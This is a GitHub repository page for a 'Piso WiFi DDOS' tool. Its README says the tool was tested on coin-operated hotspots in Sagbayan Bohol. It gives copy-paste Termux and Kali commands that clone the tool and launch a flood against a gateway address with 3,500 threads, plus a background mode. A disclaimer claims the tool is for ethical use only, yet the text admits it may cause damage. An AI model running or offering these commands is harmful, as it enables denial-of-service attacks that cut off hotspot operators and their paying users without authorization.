Skip to content

A piso Wifi DDOS TESTED ON PISO WIFI's across Sagbayan Bohol

Notifications You must be signed in to change notification settings

darkosBE/PISO-WIFI-DDOS

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Pisowifi DDOS

Requirements

Manual Install

Expand
pkg update && pkg upgrade -y
pkg install git python -y
git clone https://github.com/xiv3r/pisowifi-ddos.git
cd pisowifi-ddos
chmod 755 ddos.py
python ddos.py

Auto Install

Termux

pkg update && pkg upgrade -y && pkg install git python -y && git clone https://github.com/xiv3r/pisowifi-ddos.git && chmod 755 pisowifi-ddos/*.py && cd pisowifi-ddos && ls
Kali
sudo update && sudo apt upgrade -y && sudo apt install git python3 -y && git clone https://github.com/xiv3r/pisowifi-ddos.git && chmod 755 pisowifi-ddos/ddos.py && cd pisowifi-ddos && ls

Run

cd pisowifi-ddos
python ddos.py -s 10.0.0.1 -p 80 -t 3500
Background mode
python ddos.py -s 10.0.0.1 -p 80 -t 3500 > /dev/null 2>&1 &
kill the process
pkill -f python

Screenshot

⚠️ Disclaimers

"This tool is intended solely for ethical cybersecurity purposes, such as penetration testing, vulnerability assessments, and authorized research. Unauthorized use to disrupt networks, services, or systems is illegal and violates cybersecurity laws. Misuse may result in severe legal penalties, including fines and imprisonment. Always obtain explicit permission before testing any system. By using this tool, you agree to comply with all applicable laws and assume full responsibility for your actions.

BSD CLAUSE IS IN THE CODE DIRECTLY INCASE YOU "DIDNT KNOW" IT WILL PROTECT ME FROM YOUR STUPID MISTAKES

PLEASE DO NOT USE THIS SINCE ITS UPGRADED AND MAY CAUSE DAMAGE TO YOU AND THE PISO WIFI.

About

A piso Wifi DDOS TESTED ON PISO WIFI's across Sagbayan Bohol

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages